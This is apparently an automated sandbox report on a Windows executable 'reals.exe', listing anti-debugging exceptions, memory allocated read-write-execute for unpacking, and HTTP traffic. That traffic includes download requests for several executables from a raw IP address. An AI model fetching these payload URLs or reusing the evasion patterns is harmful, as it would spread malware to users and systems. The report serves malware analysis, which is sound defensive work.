__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x166afa @ 0x566afa reals+0x1738e5 @ 0x5738e5 reals+0x15e67c @ 0x55e67c exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x4001000a exception.offset: 46887 exception.address: 0x7597b727 registers.esp: 1637784 registers.edi: 10758400 registers.eax: 1637784 registers.ebp: 1637864 registers.edx: 0 registers.ebx: 8978900 registers.esi: 8984388 registers.ecx: 4	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: 89 11 eb 02 28 72 e9 57 f4 ff ff eb 01 e2 55 eb exception.symbol: reals+0x161468 exception.instruction: mov dword ptr [ecx], edx exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1447016 exception.address: 0x561468 registers.esp: 1638240 registers.edi: 10809648 registers.eax: 92 registers.ebp: 4286322025 registers.edx: 5637593 registers.ebx: 10747904 registers.esi: 8978900 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x160c12 @ 0x560c12 exception.instruction_r: f7 f1 eb 01 b6 e9 f0 07 00 00 eb 02 00 aa 0f 83 exception.symbol: reals+0x160b69 exception.instruction: div ecx exception.module: reals.exe exception.exception_code: 0xc0000094 exception.offset: 1444713 exception.address: 0x560b69 registers.esp: 1638128 registers.edi: 10809648 registers.eax: 3895676989 registers.ebp: 1638220 registers.edx: 5641334 registers.ebx: 8978900 registers.esi: 4194304 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: f7 f9 eb 02 3e 2c e9 03 06 00 00 eb 01 2c 55 eb exception.symbol: reals+0x160a7c exception.instruction: idiv ecx exception.module: reals.exe exception.exception_code: 0xc0000094 exception.offset: 1444476 exception.address: 0x560a7c registers.esp: 1638240 registers.edi: 11397581 registers.eax: 11397581 registers.ebp: 4286322025 registers.edx: 2130566132 registers.ebx: 10747904 registers.esi: 8978900 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8a3f74 reals+0x161d6d @ 0x561d6d exception.instruction_r: 0f 3f 07 0b c7 45 fc ff ff ff ff 33 c0 33 d2 39 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x8a40ea registers.esp: 1637880 registers.edi: 11418873 registers.eax: 1 registers.ebp: 1637892 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 2020557398	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x161d6d @ 0x561d6d exception.instruction_r: 8b 00 90 90 f8 eb 01 a3 73 42 eb 04 0d 2a e4 bb exception.instruction: mov eax, dword ptr [eax] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8a3fa4 registers.esp: 1637904 registers.edi: 11418873 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 2130563072	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x161d6d @ 0x561d6d exception.instruction_r: 90 f8 eb 01 a3 73 42 eb 04 0d 2a e4 bb eb 02 8f exception.instruction: nop exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x8a3fa7 registers.esp: 1637904 registers.edi: 11418873 registers.eax: 0 registers.ebp: 1638220 registers.edx: 2 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 2130563072	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 1637892 registers.edi: 11420029 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9060072 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: 8b c2 eb 05 8f eb f1 55 de 55 8b 60 83 6c 24 20 exception.instruction: mov eax, edx exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x8a4165 registers.esp: 1637892 registers.edi: 11420029 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9060072 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: cc eb 03 20 9e 4b 5e 5b 8b e5 5d c3 eb 02 01 bc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x8a4099 registers.esp: 1637892 registers.edi: 11420029 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9060072 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 1637892 registers.edi: 11420029 registers.eax: 0 registers.ebp: 1637916 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9060072 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: cc eb 01 69 3c 04 eb 04 15 b3 35 f3 75 58 90 90 exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x8a3f61 registers.esp: 1637900 registers.edi: 11420817 registers.eax: 4 registers.ebp: 1111705675 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 115	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: 0f b7 53 06 eb 01 e0 c1 e2 10 eb 04 1d 2a 01 19 exception.instruction: movzx edx, word ptr [ebx + 6] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8a43ec registers.esp: 1637888 registers.edi: 8978900 registers.eax: 0 registers.ebp: 1637916 registers.edx: 1637908 registers.ebx: 10446168 registers.esi: 4286372053 registers.ecx: 156	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x161d6d @ 0x561d6d exception.instruction_r: 0f 0b eb 04 31 be 6c e3 0f 0b eb 05 8a 86 83 04 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x8a99aa registers.esp: 1637904 registers.edi: 11439881 registers.eax: 0 registers.ebp: 1638220 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 235	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: RtlDosSearchPath_Ustr+0xada RtlCaptureContext-0x72 ntdll+0x46ab9 @ 0x76f56ab9 RtlDosSearchPath_Ustr+0xaac RtlCaptureContext-0xa0 ntdll+0x46a8b @ 0x76f56a8b New_ntdll_RtlDispatchException@8+0xf6 New_ntdll_RtlRemoveVectoredContinueHandler@4-0x23 @ 0x736f482b KiUserExceptionDispatcher+0xf KiRaiseUserExceptionDispatcher-0x41 ntdll+0x10143 @ 0x76f20143 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 04 df b1 d9 97 eb 01 e3 eb 03 66 39 96 exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a9b52 registers.esp: 1636112 registers.edi: 0 registers.eax: 0 registers.ebp: 1636128 registers.edx: 5629193 registers.ebx: 9083607 registers.esi: 0 registers.ecx: 1636780	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: cc eb 03 20 9e 4b 5e 5b 8b e5 5d c3 eb 02 01 bc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x8a9ae5 registers.esp: 1637892 registers.edi: 11440797 registers.eax: 5629194 registers.ebp: 1637916 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 9083188 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: 0f 0b 0f 0b eb b7 eb 03 a9 d6 2c eb 04 6b b0 4b exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x8a9b14 registers.esp: 1637892 registers.edi: 11440797 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 9083188 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: cc eb 03 20 9e 4b 5e 5b 8b e5 5d c3 eb 02 01 bc exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x8a9ae5 registers.esp: 1637892 registers.edi: 11440797 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 9083188 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: 8b c2 eb 05 8f eb f1 55 de 55 8b 60 83 6c 24 20 exception.instruction: mov eax, edx exception.exception_code: 0x80000004 exception.symbol: exception.address: 0x8a9bb1 registers.esp: 1637892 registers.edi: 11440797 registers.eax: 0 registers.ebp: 1637916 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 9083188 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: cc eb 03 18 86 64 eb 02 15 2e eb 03 f2 32 8c 8d exception.instruction: int3 exception.exception_code: 0x80000003 exception.symbol: exception.address: 0x8a9e44 registers.esp: 36962124 registers.edi: 1969139966 registers.eax: 0 registers.ebp: 36962184 registers.edx: 8982052 registers.ebx: 8978900 registers.esi: 36962124 registers.ecx: 0	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x161d6d @ 0x561d6d exception.instruction_r: cd 68 eb 04 6b 81 9f 33 66 3d 86 f3 eb 05 df 98 exception.instruction: int 0x68 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8aab32 registers.esp: 1637904 registers.edi: 11453061 registers.eax: 17152 registers.ebp: 1638220 registers.edx: 5629193 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 161	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: reals+0x161d6d @ 0x561d6d exception.instruction_r: cd 01 40 40 eb 01 f0 85 c0 70 7c 74 5b eb 05 ea exception.instruction: int 1 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x8aab29 registers.esp: 1637904 registers.edi: 11453641 registers.eax: 0 registers.ebp: 1638220 registers.edx: 9088023 registers.ebx: 8978900 registers.esi: 4286372053 registers.ecx: 5629193	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ab638 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 05 02 a8 8a 35 ac eb 19 eb 02 c2 a6 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a2497 registers.esp: 1637544 registers.edi: 11463961 registers.eax: 0 registers.ebp: 1637904 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ab72e reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1637524 registers.edi: 9090872 registers.eax: 0 registers.ebp: 1637884 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ac94a 0x8ac7fd 0x8ac18f 0x8ab7fb reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 05 02 a8 8a 35 ac eb 19 eb 02 c2 a6 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a2497 registers.esp: 1637188 registers.edi: 11464365 registers.eax: 0 registers.ebp: 1637548 registers.edx: 1637128 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ac9b9 0x8ac7fd 0x8ac18f 0x8ab7fb reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1637188 registers.edi: 11464365 registers.eax: 0 registers.ebp: 1637548 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ac9df 0x8ac439 0x8ac1d2 0x8ab7fb reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 05 02 a8 8a 35 ac eb 19 eb 02 c2 a6 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a2497 registers.esp: 1636884 registers.edi: 1637418 registers.eax: 0 registers.ebp: 1637244 registers.edx: 1637032 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8acaee 0x8ac439 0x8ac1d2 0x8ab7fb reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1636884 registers.edi: 1637418 registers.eax: 0 registers.ebp: 1637244 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ac9df 0x8ac39d 0x8ac234 0x8ab7fb reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 05 02 a8 8a 35 ac eb 19 eb 02 c2 a6 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a2497 registers.esp: 1636880 registers.edi: 1637382 registers.eax: 0 registers.ebp: 1637240 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8acaee 0x8ac39d 0x8ac234 0x8ab7fb reals+0x1738e5 @ 0x5738e5 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1636880 registers.edi: 1637382 registers.eax: 0 registers.ebp: 1637240 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8acdd0 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 05 02 a8 8a 35 ac eb 19 eb 02 c2 a6 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a2497 registers.esp: 1637544 registers.edi: 11470033 registers.eax: 0 registers.ebp: 1637904 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8adb2c reals+0x161d6d @ 0x561d6d exception.instruction_r: 0f 0b 0f 0b eb 03 65 bf 47 eb 04 bf de a7 e6 f7 exception.instruction: ud2 exception.exception_code: 0xc000001d exception.symbol: exception.address: 0x8a2488 registers.esp: 1637532 registers.edi: 11470033 registers.eax: 0 registers.ebp: 1637892 registers.edx: 5714501 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8adedd 0x8ad44a reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1637124 registers.edi: 11470033 registers.eax: 0 registers.ebp: 1637484 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8b2b57 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 05 02 a8 8a 35 ac eb 19 eb 02 c2 a6 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a2497 registers.esp: 1637524 registers.edi: 11470033 registers.eax: 0 registers.ebp: 1637884 registers.edx: 0 registers.ebx: 8978900 registers.esi: 9053161 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8b3848 0x8ad4fb reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1637408 registers.edi: 11470033 registers.eax: 0 registers.ebp: 1637768 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: 0x8ad550 reals+0x161d6d @ 0x561d6d exception.instruction_r: f7 f0 eb 02 c5 7f eb 07 eb 05 0b 0d ab 44 d3 eb exception.instruction: div eax exception.exception_code: 0xc0000094 exception.symbol: exception.address: 0x8a313a registers.esp: 1637536 registers.edi: 11470033 registers.eax: 0 registers.ebp: 1637896 registers.edx: 9056407 registers.ebx: 8978900 registers.esi: 9056407 registers.ecx: 8978900	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: 8b 00 eb 01 8e 90 eb 03 f6 91 24 e9 78 00 00 00 exception.symbol: reals+0x162001 exception.instruction: mov eax, dword ptr [eax] exception.module: reals.exe exception.exception_code: 0xc0000005 exception.offset: 1449985 exception.address: 0x562001 registers.esp: 1638240 registers.edi: 11397589 registers.eax: 0 registers.ebp: 4286325716 registers.edx: 11501809 registers.ebx: 10747904 registers.esi: 8978900 registers.ecx: 10	1
__exception__ Feb. 18, 2024, 10:41 a.m.	stacktrace: exception.instruction_r: 0f 0b eb 01 b5 0f 0b eb 03 a0 cf 76 e9 00 fe ff exception.symbol: reals+0x161cb8 exception.instruction: ud2 exception.module: reals.exe exception.exception_code: 0xc000001d exception.offset: 1449144 exception.address: 0x561cb8 registers.esp: 1638240 registers.edi: 11397589 registers.eax: 1 registers.ebp: 4286325716 registers.edx: 2130566132 registers.ebx: 10747904 registers.esi: 8978900 registers.ecx: 2119237632	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/amert.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/amert.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/ladas.exe

Performs some HTTP requests (21 events)

request	HEAD http://185.215.113.46/cost/fu.exe
request	GET http://185.215.113.46/cost/fu.exe
request	HEAD http://185.215.113.46/mine/amert.exe
request	GET http://185.215.113.46/mine/amert.exe
request	HEAD http://185.215.113.46/cost/niks.exe
request	GET http://185.215.113.46/cost/niks.exe
request	HEAD http://185.215.113.46/mine/plaza.exe
request	GET http://185.215.113.46/mine/plaza.exe
request	HEAD http://185.215.113.46/cost/ladas.exe
request	GET http://185.215.113.46/cost/ladas.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ATuJsjwZDFIam6L22WTWI-kQASX9bbFhlY8Qfpn45PMVfMK-s8Kyidgcfo81UwYYYE3hoi8cxOYr
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ATuJsjwFn3TVCNRzJMcCHLiAbyOatgCfg9GZ0yxkBGaodHQIa13Oi7C4nekCckwkC7E_8TSu1Gl5&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-2029714484%3A1708220637104788
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?9CAOBw
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 1976 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 region_size: 757760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 region_size: 307200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00890000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1093632 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1093632 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 159744 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 159744 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00533000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00533000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0050c000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2540 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bc0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 2960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73662000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:42 a.m.	process_identifier: 2960 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 region_size: 6164480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758af000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7589c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 18, 2024, 10:41 a.m.	process_identifier: 3012 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7587c000 process_handle: 0xffffffff	1
